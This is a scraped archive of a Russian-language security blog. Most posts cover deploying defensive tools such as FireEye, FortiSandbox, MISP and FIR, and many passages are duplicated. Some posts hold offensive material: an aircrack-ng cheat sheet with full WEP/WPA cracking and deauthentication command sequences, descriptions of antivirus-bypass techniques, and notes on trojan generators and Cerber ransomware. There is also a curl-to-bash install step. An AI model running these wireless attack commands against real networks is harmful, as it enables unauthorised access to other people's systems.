A start job is running for raise network interfaces:
/etc/systemd/system/network-online.targets.wants/networking.service
21:TimeoutStartSec=30sec
/etc/systemd/system/network-online.targets.wants/networking.service
21:TimeoutStartSec=30sec
13.06.2016
Windows LPE check tool
Тулза позволяет произвести аудит системы Windows, на предмет возможности локального повышения привилегий в системе.
Windows-privesc-check is standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).
It is written in python and converted to an executable using pyinstaller so it can be easily uploaded and run (as opposed to unzipping python + other dependencies). It can run either as a normal user or as Administrator (obviously it does a better job when running as Administrator because it can read more files).
QuickStartUsage:
It is written in python and converted to an executable using pyinstaller so it can be easily uploaded and run (as opposed to unzipping python + other dependencies). It can run either as a normal user or as Administrator (obviously it does a better job when running as Administrator because it can read more files).
C:\>windows-privesc-check2.exe --audit -a -o wpc-report
20.05.2016
SANS топ 20 утилит контроля ИБ
Part 1 - we look at Inventory of Authorized and Unauthorized Devices.
Part 2 - we look at Inventory of Authorized and Unauthorized Software.
Part 3 - we look at Secure Configurations.
Part 4 - we look at Continuous Vulnerability Assessment and Remediation.
Part 5 - we look at Malware Defenses.
Part 6 - we look at Application Security
Part 7 - we look at Wireless Access Control
Part 8/9 – we look at Data Recovery and Security Training.
Part 10/11 - we look at Secure Configurations for Network Devices such as Firewalls, Routers, and Switches and Limitation and Control of Network Ports, Protocols and Services.
Part 2 - we look at Inventory of Authorized and Unauthorized Software.
Part 3 - we look at Secure Configurations.
Part 4 - we look at Continuous Vulnerability Assessment and Remediation.
Part 5 - we look at Malware Defenses.
Part 6 - we look at Application Security
Part 7 - we look at Wireless Access Control
Part 8/9 – we look at Data Recovery and Security Training.
Part 10/11 - we look at Secure Configurations for Network Devices such as Firewalls, Routers, and Switches and Limitation and Control of Network Ports, Protocols and Services.
13.05.2016
Fortinet Fortimail and iRedMail configuration. [Gateway mode]
Мой опыт базовой настройки связки Fortimail и почтового сервера iRedMail.
Для начала, прописал MX записи, и доменные имена для нашей тестовой почты:
MX прописана на Fortimail
Почтовый сервер я поднял на базе iRedmail.
04.05.2016
20.04.2016
История взлома [Hacking Team]
"Хакер, называющий себя Финиас Фишер (Phineas Fisher), обнародовал на PasteBin длинный и подробный рассказ о том, как летом 2015 года ему в одиночку удалось взломать известного поставщика шпионского ПО — компанию Hacking Team."
Разбор взлома: https://xakep.ru/2016/04/18/hacking-team-hack/
Реакция HT: https://xakep.ru/2016/04/20/hacking-team-letter/
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY Guide
Ransomware [Database]
"База данных" известных криптолокеров, а так же помощь в расшифровке файлов.
названия --- расширения --- паттерны --- декрипторы
"Инструменты" виртуализации. Полезные инструменты. [заметка]
Управление виртуализацией
- Migrate: инструмент для миграции в виртуальную среду
- OpenFiler: создание сетевого файлового хранилища с управлением через веб-интерфейс
- StarWind Virtual SAN: виртуализированное хранилище, ориентированное на работу с гипервизорами
- vCenter Converter: позволяет конвертировать физическую машину под Windows и Linux в виртуальную
- RV Tools: приложение, использующее ВИ SDK для отображения информации о виртуальных машинах и ESX-хостах
- Citrix Essentials: управление хост-серверами XenServer и Hyper-V для обеспечения виртуализации корпоративного уровня
- Veeam Backup and Replication: восстановление виртуализированных приложений и данных платформ vSphere и Hyper-V
- vSphere Mobile Watchlist: позволяет мониторить виртуальную инфраструктуру удаленно с помощью смартфона
- ESX Deployment Appliance: упрощает развертку ESX-серверов
- Ganeti: система управления кластером виртуализации от компании Google
- oVirt: платформа виртуализации с простым веб-интерфейсом
- Packer: инструмент для сборки образов
- Xen: монитор виртуальных машин или гипервизор с поддержкой паравиртуализации для процессоров архитектуры x86
- CloudStack: позволяет автоматизировать развертывание, настройку и поддержание виртуальной инфраструктуры
- Vagrant: консольная утилита для создания и конфигурирования виртуальной среды разработки
- VirtualBox: легкий и надежный инструмент виртуализации
- FusionSphere: платформа виртуализации от Huawei
18.04.2016
Бот Gozi ISFB (a.k.a Ursnif)
ISFB - программа-бот предназначенная для анализа и модификации HTTP траффика на компьютере клиента.
Обрабатывает весь HTTP траффик браузера в том числе и шифрованый HTTPS.
Бот управляется с удаленного сервера, с помощью файлов конфигурации и команд.
Файлы конфигурации и команд подписываются посредством RSA. При получении файлов, бот проверяет цифровую подпись, и, в случае несоответвия подписи, файл игнорируется.
https://habrahabr.ru/company/eset/blog/281787/
- Поддерживает все 32х и 64х битные Windows, начиная с Windows XP.
- Поддерживает все 32х и 64х битные версии Internet Explorer, начиная с 6.0.
- Поддерживает все 32х и 64х битные версии Mozilla Firefox.
- Поддерживает все 32х битные версии Google Chrome.
Обрабатывает весь HTTP траффик браузера в том числе и шифрованый HTTPS.
Бот управляется с удаленного сервера, с помощью файлов конфигурации и команд.
Файлы конфигурации и команд подписываются посредством RSA. При получении файлов, бот проверяет цифровую подпись, и, в случае несоответвия подписи, файл игнорируется.
https://habrahabr.ru/company/eset/blog/281787/
14.04.2016
Графический интерфейс для volatility [GUI for Volatility Framework]
Недавно обновился VolUtility - web-бейс интерфейс для известного инструмента форенсики.
После установки Centos7 на варю, использовал скрипт с гита разработчика, который позволяет автоматизировать установку. (VolUtility + Volatility Framework)
https://raw.githubusercontent.com/kevthehermit/VolUtility/master/centos_7_bootstrap.sh
Стартуем:
cd /opt/tools/VolUtility/
./manage.py runserver 0.0.0.0:8000
Очень приятный ифейс, для выполнение рутинных задач. Полный гайд по нему, есть по ссылке выше(видео)
Выгрузка артефактов и т.п.
https://raw.githubusercontent.com/kevthehermit/VolUtility/master/centos_7_bootstrap.sh
Стартуем:
cd /opt/tools/VolUtility/
./manage.py runserver 0.0.0.0:8000
Очень приятный ифейс, для выполнение рутинных задач. Полный гайд по нему, есть по ссылке выше(видео)
После загрузки слепка памяти(в моем случае это седьмая форточка) для анализа:
Генерация дерева процессов:
Скрипт установки Splunk
Для автоматического развертывания мониторинга логов в реальном времени. Отладка.
Скрипт взят из репозитория:
Развертывание Openstack скрипты:
Обзор, настройка и тестирование Fireeye HX [Configure Fireeye HX +CM+NX] Часть1
Решение Fireeye HX позволяет отслеживать вредоносную активность на рабочей станции, для более оперативного реагирование на инциденты информационной безопасности, расследование инцидентов (forensic, слепки памяти и т.п.) и изоляцией зараженной станции, для предотвращения распространения инфекции далее по сети.
Недавно HX попал в нашу лабораторию и я сделал базовые настройки и протестировал отработку связки - CM + NX + HX.
CM - платформа "центрального менеджмента" для остальных устройств, служит так же для обмена индикаторами компрометации (IOC) между всеми устройствами.
NX - предназначен для анализа проходящего через него трафика, на наличие вредоносного кода или аномальной активности.
HX - было упомянуто в самом начале :)
Топологию можно найти в других постах, просто к ней добавилось устройство HX, которое было подключено к CM :
Базовая настройка Fireeye NX EX FX CM basic config
Базовая настройка Fireeye NX EX FX CM basic config
http://devnulls.blogspot.com/2015/04/fireeye-nx-ex-fx-cm-basic-config.html
Тестирование Fireeye EX в режиме MTA + URL Dynamic Analysis / Test Fireeye EX MTA + URLDA
Тестирование Fireeye EX в режиме MTA + URL Dynamic Analysis / Test Fireeye EX MTA + URLDA
http://devnulls.blogspot.com/2015/05/fireeye-ex-mta-url-dynamic-analysis.html
BCC. Postfix / MS Exchange + Fireeye EX
BCC. Postfix / MS Exchange + Fireeye EX
http://devnulls.blogspot.com/2015/07/bcc-postfix.html
Настройка и тестирование Fireeye EX в режиме MTA / Fireeye EX MTA config
Настройка и тестирование Fireeye EX в режиме MTA / Fireeye EX MTA config
08.04.2016
Красивый мониторинг сервака [netdata] (Real Time Performance Monitoring)
Дебиан-лайк:
Для цента тоже самое, проблемы только с zlib1g-dev.
yum install zlib-devel ghc-zlib-devel zlib-static gcc make git autoconf autogen automake pkg-config
cd netdata
./netdata-installer.sh
21.03.2016
[Cerber Ransomware] Схема работы / Партнерка
Как монетизируют загрузки:
Схема шифрования:
--------------------------------------------------
После запуска на компьютере пользователя генерируются локальные ключи RSA 576 бит (приватный и публичный).
В дальнейшем эти ключи будут использоваться для шифрования и расшифровки файлов.
Предварительно в релиз зашит глобальный публичный ключ RSA 2048 бит.
Данный ключ используется для шифрования локального приватного ключа RSA 576 бит.
Глобальный приватный ключ RSA 2048 бит находится на .Onion сервере в анонимной сети Tor.
После шифрования локального приватного ключа RSA 576 бит генерируется список файлов для шифрования.
Данный список содержит файлы определенных расширений, список сортируется по времени модификации и важности файлов.
Начинается шифрование файлов.
Каждый файл шифруется с помощью алгоритма RC4 с длиной ключа 128 бит.
Для каждого файла генерируется случайный ключ, который шифруется с помощью локального публичного ключа RSA 576 бит.
Также с помощью локального публичного ключа RSA 576 бит шифруется заголовок исходного файла, что значительно затрудняет расшифровку файлов без дешифратора (месяцы на расшифровку 1-ого файла).
Шифруется не только содержимое файлов, но и их имена.
Меняется время создания и время модификации файлов.
После шифрования всех файлов пользователю показывается инструкция по расшифровке.
Для расшифровки файлов пользователю необходимо скачать "Tor Browser", зайти на специальный .Onion сайт (лэндинг) и следовать инструкциям на этом сайте.
Лэндинг
--------------------------------------------------
Схема шифрования:
--------------------------------------------------
После запуска на компьютере пользователя генерируются локальные ключи RSA 576 бит (приватный и публичный).
В дальнейшем эти ключи будут использоваться для шифрования и расшифровки файлов.
Предварительно в релиз зашит глобальный публичный ключ RSA 2048 бит.
Данный ключ используется для шифрования локального приватного ключа RSA 576 бит.
Глобальный приватный ключ RSA 2048 бит находится на .Onion сервере в анонимной сети Tor.
После шифрования локального приватного ключа RSA 576 бит генерируется список файлов для шифрования.
Данный список содержит файлы определенных расширений, список сортируется по времени модификации и важности файлов.
Начинается шифрование файлов.
Каждый файл шифруется с помощью алгоритма RC4 с длиной ключа 128 бит.
Для каждого файла генерируется случайный ключ, который шифруется с помощью локального публичного ключа RSA 576 бит.
Также с помощью локального публичного ключа RSA 576 бит шифруется заголовок исходного файла, что значительно затрудняет расшифровку файлов без дешифратора (месяцы на расшифровку 1-ого файла).
Шифруется не только содержимое файлов, но и их имена.
Меняется время создания и время модификации файлов.
После шифрования всех файлов пользователю показывается инструкция по расшифровке.
Для расшифровки файлов пользователю необходимо скачать "Tor Browser", зайти на специальный .Onion сайт (лэндинг) и следовать инструкциям на этом сайте.
Лэндинг
--------------------------------------------------
14.03.2016
DDoS Mitigation Arbor Peakflow SP and Juniper MX [ flowspec / blackhole ]
Добрый день !
Защита од DDoS атак, методом FlowSpec. Настройка связки Arbor Peakflow SP CP (Collector Platform) и маршрутизатора Juniper MX 480, без использования TMS.
Хотел бы немного поделится информацией по поводу тестов и проведенных исследований и общения с крутыми спецами из Arbor Networks, в рамках данной связки.
Немного олдовой картинки :)
Немного подумав, можно преподнести эту связку следующим образом:
Если заглянуть последний WISR (Worldwide Infrastructure Security Report), то можно обнаружить интересную статистику.
А именно:
Хотел бы немного поделится информацией по поводу тестов и проведенных исследований и общения с крутыми спецами из Arbor Networks, в рамках данной связки.
Немного олдовой картинки :)
Немного подумав, можно преподнести эту связку следующим образом:
Если заглянуть последний WISR (Worldwide Infrastructure Security Report), то можно обнаружить интересную статистику.
А именно:
- 65% всех атак - атаки на переполнение емкости каналов связи. Это различные Amplification - DNS, NTP, SNMP, и т.п.
- остальные 35% приблизительно поровну State-exhaustion (TCP Flood_ы) и Application-layer (HTTP flood_ы, LOIC, HOIC, Slowloris, и т.п.) атаки
- при этом 56% опрошенных нами клиентов видят многовекторные атаки, т.е. практически одномоментный в профиле трафика могут присутствовать все три или любые из двух типов атак. Эта статистика из года в год приблизительно одинакова.
12.03.2016
10.03.2016
Docker + shipyard [Web iface + Clustering] on Ubuntu 15.10
Установка Docker на Ubuntu 15.10 с надстройкой Shipyard (управление и деплой контейнеров через удобный web интерфейс + подключение других нод (кластеризация) ), построенной на Docker Swarm.
Установка докера:
# apt-get update && apt-get dist-upgrade -y
# apt-get install apt-transport-https ca-certificates
# apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
# nano /etc/apt/sources.list.d/docker.list
deb https://apt.dockerproject.org/repo ubuntu-wily main
# apt-get update
# apt-get purge lxc-docker
# apt-cache policy docker-engine
# apt-get install linux-image-extra-$(uname -r)
# apt-get install docker-engine
# service docker start
# docker run hello-world
Установка Shipyard :
# curl -sSL https://shipyard-project.com/deploy | bash -s
Shipyard available at http://192.168.1.9:8080
Username: admin
Password: shipyard
Ссылки:
09.03.2016
WIFI scanner [Vistumbler] windows
A wireless network scanner written in AutoIT for Vista, Windows 7, Windows 8, and Windows 10. VistumblerMDB is the current version of Vistumbler. http://www.vistumbler.net
Volatility Memory Forensics Framework + WEB
Volatility Framework является полностью открытым набором инструментов, реализованных на Python под лицензией GNU General Public License, для извлечения цифровых артефактов из энергозависимой памяти (RAM).
04.03.2016
Malware Information Sharing Platform (MISP) on Doker
MISP (“Malware Information Sharing Platform“) is a free software which was initially created by the Belgian Defence to exchange IOC’s with partners like the NCIRC (NATO). Today it became an independent project and is mainly developed by a group of motivated people. MISP is mainly used by CERT’s (“Computer Emergency Response Team”) but also private companies to exchange thousands on IOC’s on a daily basis.
To build the Docker image:
Change the ‘baseurl‘ parameter in /var/www/MISP/app/Config/config.php
Reconfigure Postfix to match your SMTP environment
To use MISP, point your browser to https://your-docker-server:443.
# git clone https://github.com/xme/misp-docker # cd misp-docker # docker build -t misp/misp --build-arg MYSQL_ROOT_PASSWORD=<mysql_root_pw> . # cat <<__END__ >env.txt MYSQL_ROOT_PASSWORD=my_strong_root_pw MYSQL_MISP_PASSWORD=my_strong_misp_pw __END__ # docker run -d -p 443:443 --env-file=env.txt --restart=always --name misp misp/mispOnce the container booted, there are still some manual operations to perform. Feel free to fine-tune it to your needs if you already know the tool.
Change the ‘baseurl‘ parameter in /var/www/MISP/app/Config/config.php
Reconfigure Postfix to match your SMTP environment
To use MISP, point your browser to https://your-docker-server:443.
The files are available on my github.com repository.
03.03.2016
VMware NSX for vSphere и Nutanix Xtreme Computing Platform (XCP + NSX)
На примере ниже трафик подсистемы хранения передаётся между узлами (хостами) через VLAN 101, а трафик рабочих виртуальных машин, инкапсулированный в VXLAN, передаётся через VLAN 401.
NSX используется как для рабочей нагрузки, так и для Nutanix CVM.
Заключение
Использование VMware NSX с Nutanix даёт системным администраторам возможность построения мощных и гибких решений, свободных от ограничений традиционных физических инфраструктур. Платформа Nutanix Xtreme Computing Platform (XCP) предоставляет вычислительные ресурсы и подсистему хранения, в то время как NSX создаёт виртуальную сетевую инфраструктуру, не привязанную к физическим сетевым компонентам. В Nutanix проверили, что оба эти компонента успешно интегрируются друг с другом в результате чего достигаются все преимущества, предоставляемые программно-определяемым ЦОД, включая логическое разделение инфраструктуры хранения, изоляцию виртуальных сетей, политики безопасности, перемещаемые вместе с виртуальными машинами и автоматизацию рабочих процессов.
Nutanix with VMware NSX позволяет администраторам сфокусироваться на построении масштабируемых приложений, так как вне зависимости от того, где работает виртуальная машина, она всегда будет иметь доступ к необходимым ресурсам. Стабильная и надёжная физическая инфраструктура предоставляет основу для гибкой и удобной виртуальной сети, всегда готовой к расширению при необходимости.
NSX используется как для рабочей нагрузки, так и для Nutanix CVM.
В альтернативном варианте, показанном ниже, к сети NSX подключены как рабочие виртуальные машины, так и Nutanix CVM. Связь между CVM на разных узлах кластера Nutanix обеспечивается по виртуальной сети 5000. Адресация виртуальных адаптеров для управления и VXLAN, в приведённом примере, иллюстрирует ситуацию, когда два узла кластера находятся в разных серверных стойках, разделённых маршрутизатором. Инкапсуляция пакетов в VXLAN позволяет преодолеть это ограничение.
Заключение
Использование VMware NSX с Nutanix даёт системным администраторам возможность построения мощных и гибких решений, свободных от ограничений традиционных физических инфраструктур. Платформа Nutanix Xtreme Computing Platform (XCP) предоставляет вычислительные ресурсы и подсистему хранения, в то время как NSX создаёт виртуальную сетевую инфраструктуру, не привязанную к физическим сетевым компонентам. В Nutanix проверили, что оба эти компонента успешно интегрируются друг с другом в результате чего достигаются все преимущества, предоставляемые программно-определяемым ЦОД, включая логическое разделение инфраструктуры хранения, изоляцию виртуальных сетей, политики безопасности, перемещаемые вместе с виртуальными машинами и автоматизацию рабочих процессов.
Nutanix with VMware NSX позволяет администраторам сфокусироваться на построении масштабируемых приложений, так как вне зависимости от того, где работает виртуальная машина, она всегда будет иметь доступ к необходимым ресурсам. Стабильная и надёжная физическая инфраструктура предоставляет основу для гибкой и удобной виртуальной сети, всегда готовой к расширению при необходимости.
01.03.2016
Cheat - aircrack-ng
#Wifi Cheat Sheet - aircrack-ng
===============================
#Start Monitor Mode and Save captures
iw dev wlan0 add interface mon0 type monitor
airmon-ng start wlan0 <Chanel>
airodump-ng -c <Chanel> --bssid <MAC AP> -w <NameCapture> <InterfaceMonitor>
# To crack WEP for a given essid name and store into a file
aircrack-ng -a 1 -e <essid> -l <output file> <.cap or .ivs file(s)>
# To crack WPA/WPA2 from airolib-ng database
aircrack-ng -e <essid> -r <database> <.cap or .ivs file(s)>
# To crack WPA/WPA2 from a wordlist
aircrack-ng -e <essid> -w <wordlist> <.cap or .ivs file(s)>
# To crack a given bssid
aircrack-ng -b <bssid> -l <output file> <.cap or .ivs file(s)>
# To crack a given bssid using FMS/Korek method
aircrack-ng -K -b <bssid> <.cap or .ivs file(s)>
# To crack a given essid (WEP) and display the ASCII of the key
aircrack-ng -e <essid> -s <.cap of .ivs file(s)>
# To crack a given essid (WEP) and create a EWSA Project
aircrack-ng -e <essid> -E <EWSA file> <.cap or .ivs file(s)>
=== cracking WPA ====================================================================================================
airmon-ng start wlan0
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {disassociation attack}
aircrack-ng -0 -w (wordlist path) (caputure filename)
=== cracking WEP with Connected Clients =============================================================================
airmon-ng start wlan0 ( channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {disassociation attack}
aireplay-ng -3 -b (AP MAC) -h (OUR MAC) mon0 {ARP replay attack}
=== cracking WEP via a Client =======================================================================================
airmon-ng start wlan0 (channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -2 -b (AP MAC) -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0
aireplay-ng -2 -r (replay cap file) mon0 {inject using cap file}
aircrack-ng -0 -z(PTW) -n 64(64bit) filename.cap
=== ARP amplification ===============================================================================================
airmon-ng start wlan0 ( channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 500 -q 8 -a (AP MAC) mon0
areplay-ng -5 -b (AP MAC) -h (OUR MAC) mon0
packetforge-ng -0 -a (AP MAC) -h (OUR MAC) -k 255.255.255.255 -l 255.255.255.255 -y (FRAGMENT.xor) -w (filename.cap)
tcpdump -n -vvv -e -s0 -r (replay_dec.#####.cap)
packetforge-ng -0 -a (AP MAC) -h (OUR MAC) -k (destination IP) -l (source IP) -y (FRAGMENT.xor) -w (filename.cap)
aireplay-ng -2 -r (filename.cap) mon0
=== cracking WEP /w shared key AUTH =================================================================================
airmon-ng start wlan0 ( channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
~this will error out~aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {deauthentication attack}
aireplay-ng -1 60 -e (ESSID) -y (sharedkeyfile) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication /w PRGA xor file}
aireplay-ng -3 -b (AP MAC) -h (OUR MAC) mon0 {ARP replay attack}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {deauthentication attack}
aircrack-ng -0 -z(PTW) -n 64(64bit) filename.cap
===============================
#Start Monitor Mode and Save captures
iw dev wlan0 add interface mon0 type monitor
airmon-ng start wlan0 <Chanel>
airodump-ng -c <Chanel> --bssid <MAC AP> -w <NameCapture> <InterfaceMonitor>
# To crack WEP for a given essid name and store into a file
aircrack-ng -a 1 -e <essid> -l <output file> <.cap or .ivs file(s)>
# To crack WPA/WPA2 from airolib-ng database
aircrack-ng -e <essid> -r <database> <.cap or .ivs file(s)>
# To crack WPA/WPA2 from a wordlist
aircrack-ng -e <essid> -w <wordlist> <.cap or .ivs file(s)>
# To crack a given bssid
aircrack-ng -b <bssid> -l <output file> <.cap or .ivs file(s)>
# To crack a given bssid using FMS/Korek method
aircrack-ng -K -b <bssid> <.cap or .ivs file(s)>
# To crack a given essid (WEP) and display the ASCII of the key
aircrack-ng -e <essid> -s <.cap of .ivs file(s)>
# To crack a given essid (WEP) and create a EWSA Project
aircrack-ng -e <essid> -E <EWSA file> <.cap or .ivs file(s)>
=== cracking WPA ====================================================================================================
airmon-ng start wlan0
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {disassociation attack}
aircrack-ng -0 -w (wordlist path) (caputure filename)
=== cracking WEP with Connected Clients =============================================================================
airmon-ng start wlan0 ( channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {disassociation attack}
aireplay-ng -3 -b (AP MAC) -h (OUR MAC) mon0 {ARP replay attack}
=== cracking WEP via a Client =======================================================================================
airmon-ng start wlan0 (channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -2 -b (AP MAC) -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0
aireplay-ng -2 -r (replay cap file) mon0 {inject using cap file}
aircrack-ng -0 -z(PTW) -n 64(64bit) filename.cap
=== ARP amplification ===============================================================================================
airmon-ng start wlan0 ( channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
aireplay-ng -1 500 -q 8 -a (AP MAC) mon0
areplay-ng -5 -b (AP MAC) -h (OUR MAC) mon0
packetforge-ng -0 -a (AP MAC) -h (OUR MAC) -k 255.255.255.255 -l 255.255.255.255 -y (FRAGMENT.xor) -w (filename.cap)
tcpdump -n -vvv -e -s0 -r (replay_dec.#####.cap)
packetforge-ng -0 -a (AP MAC) -h (OUR MAC) -k (destination IP) -l (source IP) -y (FRAGMENT.xor) -w (filename.cap)
aireplay-ng -2 -r (filename.cap) mon0
=== cracking WEP /w shared key AUTH =================================================================================
airmon-ng start wlan0 ( channel)
airodump-ng -c (channel) –bssid (AP MAC) -w (filename) mon0
~this will error out~aireplay-ng -1 0 -e (ESSID) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {deauthentication attack}
aireplay-ng -1 60 -e (ESSID) -y (sharedkeyfile) -a (AP MAC) -h (OUR MAC) mon0 {fake authentication /w PRGA xor file}
aireplay-ng -3 -b (AP MAC) -h (OUR MAC) mon0 {ARP replay attack}
aireplay-ng -0 1 -a (AP MAC) -c (VIC CLIENT) mon0 {deauthentication attack}
aircrack-ng -0 -z(PTW) -n 64(64bit) filename.cap
24.02.2016
Семплы / источники малвари.
Ресурсы с семплами вредоносных файлов:
VX Vault
Malekal
MalwareBlacklist
Feodo Tracker
ZeuS Tracker
SpyEye Tracker
Palevo Tracker
SafeGroup
Clean MX
Malc0de
Malware Domain List
NovCon Minotaur
23.02.2016
Twitter sec memories #5 [23.02.16] (PSMSF/MODBUS/Pin/pentestly/foolav)
Python and Powershell internal penetration testing framework
PSMSF
create powershell shell code used in cmd console with Metasploit Framework
19.02.2016
Самозащита антивирусов. [AV bypass]
Применяемые техники:
ProxyInject атака
Заключается в использовании оригинальных бинарных файлов антивируса с последующим
инжектированием в них вредоносного кода. Успешность эксплуатации данного метода определяется в конечном счете успехом инжектирования атакующего кода.
PageFile атака
Блокирование функционала антивирусного программного обеспечения путем обхода файлового фильтра через ядерную функцию создания page-файла.
RegSafe, RegRestore атака
Атака на конфигурационные данные антивирусного решения в реестре с использованием функции восстановления кустов реестра.
ссылка на исследование Dsec:
http://dsec.ru/upload/medialibrary/216/216367fd007f81be723f5d4fc47184e0.pdf
Заключается в использовании оригинальных бинарных файлов антивируса с последующим
инжектированием в них вредоносного кода. Успешность эксплуатации данного метода определяется в конечном счете успехом инжектирования атакующего кода.
PageFile атака
Блокирование функционала антивирусного программного обеспечения путем обхода файлового фильтра через ядерную функцию создания page-файла.
Duplicate Handle атака
Суть – в получении обработчика через открытие защищаемого антивирусом процесса, с меньшим уровнем доступа и с его последующим повышением через дупликацию объекта описателя открытого процесса. В итоге, это может привести к полной компрометации процессов антивируса либо к инжектированию в них вредоносного кода.
RegSafe, RegRestore атака
Атака на конфигурационные данные антивирусного решения в реестре с использованием функции восстановления кустов реестра.
Shim engine атака
Блокирование функционала, инжектирование кода (при запуске антивирусного программного обеспечения) посредством установки специальной базы совместимости приложения, shim-engine инфраструктуры.
Reparse-Point атака
Блокирование функционала антивирусного ПО через открытие на защищаемой директории NTFS-потока и установку точки повторной обработки.
ссылка на исследование Dsec:
http://dsec.ru/upload/medialibrary/216/216367fd007f81be723f5d4fc47184e0.pdf
16.02.2016
Twitter sec memories #4 [16.02.16] (Shellsploit/HackSpy/CVE-2016-0051/REMnux)
Shellsploit
pip install readline
HackSpy-Trojan-Exploit
CVE-2016-0051 (Proof-of-concept BSoD (Blue Screen of Death) and Elevation of Privilege (to SYSTEM))
Version 6 Release
REMNUX V6 FOR MALWARE ANALYSIS (PART 1-2)
Позволяет генерировать кастомные шеллкоды, бэкдоры и инжекторы для различных операционных систем, с возможностью обфускации через энкодеры.
Зависимости:
pip install capstonepip install readline
Пуск:
python setup.py --s/ --setup install
chmod +x shellsploitpython setup.py --s/ --setup install
./shellsploit
Удаление:
setup.py --s/--setup uninstallHackSpy-Trojan-Exploit
Тулза для генерации трояна, нацеленного на пробитие windows тачки.
- Кейлоггер
- Скрины рабочего стола
- Контроль бота через cmd
Version 6 Release
15.02.2016
Twitter sec memories #3 [15.02.15] (Sublist3r/GoAT/GoBot/DLLRunner)
Sublist3r
Утилита написана на python, для поиска собдоменов, с использованием поисковых движков-Google, Yahoo, Bing, Baidu, и Ask
(Fast subdomains enumeration tool for penetration testers)
git clone https://github.com/aboul3la/Sublist3r.git
GoAT
GoAT
Троян написанный на языке Go, который использует твиттер в качестве командного центра для управления ботами. Имеет руткит подуль, написанный на C для самозащиты и хайда себя в системе.
Старшим братом которого является:
GoBot
Скрипт на python для анализа dll`лок в песочнице.
10.02.2016
Платформа управления инцидентами безопасности (FIR) [Fast Incident Response]
FIR - легковесная платформа управления инцидентами безопасности . Она позволит легко создавать инцидетны, отслеживать их, а так же генерировать репорты по ним.
Платформа подойдет для трекинга инцидентов CSIRTs, CERTs, SOCs, etc.
Я рассмотрю быстрое развертывание (не продакшн) на базе виртуалки с Ubuntu server 15 на борту:
#apt-get update
#apt-get install python-dev python-pip python-lxml git libxml2-dev libxslt1-dev libz-dev
#pip install virtualenv
Платформа подойдет для трекинга инцидентов CSIRTs, CERTs, SOCs, etc.
#apt-get update
#apt-get install python-dev python-pip python-lxml git libxml2-dev libxslt1-dev libz-dev
#pip install virtualenv
Создаем виртуальное окружение:
#virtualenv env-FIR
#source env-FIR/bin/activate
#git clone https://github.com/certsocietegenerale/FIR.git
#virtualenv env-FIR
#source env-FIR/bin/activate
#git clone https://github.com/certsocietegenerale/FIR.git
#cd FIR
#pip install -r requirements.txt
#pip install -r requirements.txt
Активируем плагины:
#cp fir/config/installed_apps.txt.sample fir/config/installed_apps.txt
#./manage.py migrate
#./manage.py loaddata incidents/fixtures/seed_data.json
#./manage.py loaddata incidents/fixtures/dev_users.json
Стартуем:
#./manage.py loaddata incidents/fixtures/seed_data.json
#./manage.py loaddata incidents/fixtures/dev_users.json
Стартуем:
#./manage.py runserver 192.168.1.16:8000
Если разворачивать платформу в продакшн, есть отдельный гайд:
Если система приживется, возможно разверну и опишу тонкости процесса позже.
Дефолтный доступ: admin:admin
В итоге имеем простую, гибкую и кастомизируемую "тикет систему" с ИБ уклоном.
Система базируется на Django.
09.02.2016
FortiSandbox Fortinet [sniffer] part1.1
Опыт развертывания FortiSandbox, системы динамического + статического анализа файлов от компании Fortinet.
Часть 1.1
После установки и базовой настройки, я создал vswitch (vlan999) в промискус-моде, и подключил туда 3 устройства:
Часть 1.1
После установки и базовой настройки, я создал vswitch (vlan999) в промискус-моде, и подключил туда 3 устройства:
- FortiSandbox, портом "port6"
- Windows 7
- Ubuntu Server 15 с апачем на борту.
Настройка порта на санбоксе:
08.02.2016
FortiSandbox Fortinet [ basic install / configure ] [part1.0]
Опыт развертывания FortiSandbox, системы динамического + статического анализа файлов от компании Fortinet.
Часть 1.0
Ко мне на тест попал виртуальный аплайнс для развертывания на гипервизорах vmware.
После запроса лицензий инстанс был зарегистрирован в базе форти и был сгенерирован файл для активации виртуалки (.lic)
Установка и настройка Fortisandbox:
Обязательным условием является поддержка CPU опций:
Intel Virtualization Technology (VT-x/EPT) или AMD Virtualization (AMD-V/RVI),
а так же в BIOS должен быть включен - Virtualization Technology and 64-bit support.
